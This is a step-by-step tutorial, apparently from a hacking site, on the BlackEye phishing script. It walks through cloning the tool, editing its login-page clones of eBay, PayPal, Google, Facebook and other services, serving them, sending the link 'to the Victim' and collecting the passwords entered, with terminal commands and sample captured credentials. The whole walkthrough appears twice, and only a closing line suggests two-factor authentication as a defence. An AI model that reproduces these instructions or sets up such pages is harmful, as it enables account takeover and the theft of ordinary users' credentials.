Social media accounts are a favorite target of hackers, and the most effective tactics for attacking accounts on sites like Facebook, Instagram, and Twitter are often based on phishing. These password thefts are based on the fact that users enter their passwords on a fake web page, and it is becoming easier to do them thanks to tools like BlackEye.
BlackEye is a tool to quickly generate phishing social media websites, making it much easier to find leads on the same network. After redirecting the target to a phishing page, you can easily retrieve passwords for your social media accounts.
BlackEye for phishing on social media
Users trust their social media accounts. If the target does not have 2FA enabled, the ease with which an attacker can gain access to them can be surprising. BlackEye is a proof of concept that shows these phishing pages don't have to be complex or complex to customize to work effectively.
BlackEye is a simple bash script that presents several templates to choose from, allowing you to choose which social media website to emulate. From there, it creates a functional phishing site on your device with the ability to forward ports or other connections to your target's machine.
Supported Social Media Sites
BlackEye supports 32 different phishing website templates, but they vary in quality. It is better to test them before deploying them, because some people complain about the flaws that can give them away if the user pays attention to it. While the default phishing pages provided with BlackEye are pretty good, it's always good to be able to change them.
Some of the more interesting sites BlackEye maintains include Protonmail, Github, Gitlab, Adobe, Verizon, Twitter, Facebook, Shopify, PayPal, and Google. You can quickly test them out by following the steps below and head to a phishing URL to find out how realistic each template looks like.
What is necessary
BlackEye is an extremely simple tool, but works best on Kali Linux. This is due to the number of dependencies, but they can be installed as needed on Ubuntu or Debian devices. After you have completely updated your Kali distribution, you must install BlackEye.
Step 1. Download and test BlackEye
First, we need to clone the source code from the BlackEye GitHub repository. To do this, open a new terminal window and enter the following git and cd commands :
Cloning into 'blackeye' ...
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB / s, done.
Resolving deltas: 100% (101/101), done.
This should install the BlackEye repository and make it run from the blackeye folder using the blackeye.sh bash command . When we run this command, we will see the splash screen below.
:: Disclaimer: Developers assume no liability and are not ::
:: responsible for any misuse or damage caused by BlackEye. ::
:: Only use for educational purporses !! ::
:: Attacking targets without mutual consent is illegal! ::
[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
UPGRADED BY: @suljot_gjoka
Step 2. Set up phishing sites
If we don't like something like an expired copyright notice, we can change it quite easily. First, exit the bash script back to the BlackEye folder. We will then enter ls to see the sites folder in the BlackEye repository.
We can navigate to it using the cd sites command. Then enter ls to see all phishing site templates available for editing.
To edit Protonmail, we can type cd protonmail and then ls again to see the files in that folder. You should see something like the files below.
To change the HTML- code phishing pages, you can do it yourself by opening login.html in a text editor that makes it easy to update any copyright notices or other information.
Step 3. Turn on the phishing page
To launch our phishing page, open a terminal window and navigate to the BlackEye folder again. Then run the bash blackeye.sh command to return to the phishing page selection menu. Here we will choose eBay - number 18.
[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
UPGRADED BY: @suljot_gjoka
[*] Choose an option: 18
After entering the number of the site you want to create, press Enter . Next, we will be asked to provide our IP address. If you hit Enter without adding one, it will try to add your default, but that doesn't always work. After providing your IP address, you should see something like the prompt below.
[*] Put your local IP (Default 10.0.6.27):
[*] Starting php server ...
[*] Send this link to the Victim: 192.168.0.16
[*] Waiting victim open the link ...
Then follow the phishing link in your browser to see the result of your phishing site.
Step 4. Capture the password
When you open the site in a browser, it should look something like this:
Opening the link forces the script to report the type of devices that are currently accessing the phishing page.
[*] Waiting victim open the link ...
[*] IP Found!
[*] Victim IP: 192.168.43.142
[*] User-Agent: User-Agent: Mozilla / 5.0 (X11; Linux x86_64; rv: 60.0) Gecko / 20100101 Firefox / 60.0
[*] Saved: shopping / saved.ip.txt
Once the target enters their credentials, they are redirected to the real eBay page, giving the illusion of a successful login.
On the hacker side, BlackEye provides us with the credentials that were just entered by our target.
[*] Waiting credentials ...
[*] Credentials Found!
[*] Account: fudruckers
[*] Password: thefudruckerking69
[*] Saved: sites / shopping / saved.usernames.txt
Thus, we intercepted and saved the credentials entered by the target on our phishing page!
Output
To defend against this attack, you need to enable two-factor authentication everywhere. Without it, one mistake could lead to your password being stolen and used by an attacker to access your account. Therefore, set up 2FA on Facebook, Instagram and any of your other accounts.
BlackEye is a tool to quickly generate phishing social media websites, making it much easier to find leads on the same network. After redirecting the target to a phishing page, you can easily retrieve passwords for your social media accounts.
BlackEye for phishing on social media
Users trust their social media accounts. If the target does not have 2FA enabled, the ease with which an attacker can gain access to them can be surprising. BlackEye is a proof of concept that shows these phishing pages don't have to be complex or complex to customize to work effectively.
BlackEye is a simple bash script that presents several templates to choose from, allowing you to choose which social media website to emulate. From there, it creates a functional phishing site on your device with the ability to forward ports or other connections to your target's machine.
Supported Social Media Sites
BlackEye supports 32 different phishing website templates, but they vary in quality. It is better to test them before deploying them, because some people complain about the flaws that can give them away if the user pays attention to it. While the default phishing pages provided with BlackEye are pretty good, it's always good to be able to change them.
Some of the more interesting sites BlackEye maintains include Protonmail, Github, Gitlab, Adobe, Verizon, Twitter, Facebook, Shopify, PayPal, and Google. You can quickly test them out by following the steps below and head to a phishing URL to find out how realistic each template looks like.
What is necessary
BlackEye is an extremely simple tool, but works best on Kali Linux. This is due to the number of dependencies, but they can be installed as needed on Ubuntu or Debian devices. After you have completely updated your Kali distribution, you must install BlackEye.
Step 1. Download and test BlackEye
First, we need to clone the source code from the BlackEye GitHub repository. To do this, open a new terminal window and enter the following git and cd commands :
Code:
~ $ git clone https://github.com/thelinuxchoice/blackeyeCloning into 'blackeye' ...
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB / s, done.
Resolving deltas: 100% (101/101), done.
Code:
~ $ cd blackeye
~ / blackeye $This should install the BlackEye repository and make it run from the blackeye folder using the blackeye.sh bash command . When we run this command, we will see the splash screen below.
Code:
~ / blackeye $ bash blackeye.sh:: Disclaimer: Developers assume no liability and are not ::
:: responsible for any misuse or damage caused by BlackEye. ::
:: Only use for educational purporses !! ::
:: Attacking targets without mutual consent is illegal! ::
[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
UPGRADED BY: @suljot_gjoka
Step 2. Set up phishing sites
If we don't like something like an expired copyright notice, we can change it quite easily. First, exit the bash script back to the BlackEye folder. We will then enter ls to see the sites folder in the BlackEye repository.
Code:
~ / blackeye $ ls
blackeye.sh LICENSE README.md sitesWe can navigate to it using the cd sites command. Then enter ls to see all phishing site templates available for editing.
Code:
~ / blackeye $ cd sites
~ / blackeye / sites $ ls
adobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpress
badoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoo
create dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandexTo edit Protonmail, we can type cd protonmail and then ls again to see the files in that folder. You should see something like the files below.
Code:
~ / blackeye / sites $ cd protonmail
~ / blackeye / sites / protonmail $ ls
index_files index.php ip.php ip.txt login.html login.php saved.ip.txt saved.usernames.txtTo change the HTML- code phishing pages, you can do it yourself by opening login.html in a text editor that makes it easy to update any copyright notices or other information.
Step 3. Turn on the phishing page
To launch our phishing page, open a terminal window and navigate to the BlackEye folder again. Then run the bash blackeye.sh command to return to the phishing page selection menu. Here we will choose eBay - number 18.
Code:
~ / blackeye / sites / protonmail $ cd
~ $ cd blackeye
~ / blackeye $ bash blackeye.sh[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
UPGRADED BY: @suljot_gjoka
[*] Choose an option: 18
After entering the number of the site you want to create, press Enter . Next, we will be asked to provide our IP address. If you hit Enter without adding one, it will try to add your default, but that doesn't always work. After providing your IP address, you should see something like the prompt below.
[*] Put your local IP (Default 10.0.6.27):
[*] Starting php server ...
[*] Send this link to the Victim: 192.168.0.16
[*] Waiting victim open the link ...
Then follow the phishing link in your browser to see the result of your phishing site.
Step 4. Capture the password
When you open the site in a browser, it should look something like this:
Opening the link forces the script to report the type of devices that are currently accessing the phishing page.
[*] Waiting victim open the link ...
[*] IP Found!
[*] Victim IP: 192.168.43.142
[*] User-Agent: User-Agent: Mozilla / 5.0 (X11; Linux x86_64; rv: 60.0) Gecko / 20100101 Firefox / 60.0
[*] Saved: shopping / saved.ip.txt
Once the target enters their credentials, they are redirected to the real eBay page, giving the illusion of a successful login.
On the hacker side, BlackEye provides us with the credentials that were just entered by our target.
[*] Waiting credentials ...
[*] Credentials Found!
[*] Account: fudruckers
[*] Password: thefudruckerking69
[*] Saved: sites / shopping / saved.usernames.txt
Thus, we intercepted and saved the credentials entered by the target on our phishing page!
Output
To defend against this attack, you need to enable two-factor authentication everywhere. Without it, one mistake could lead to your password being stolen and used by an attacker to access your account. Therefore, set up 2FA on Facebook, Instagram and any of your other accounts.
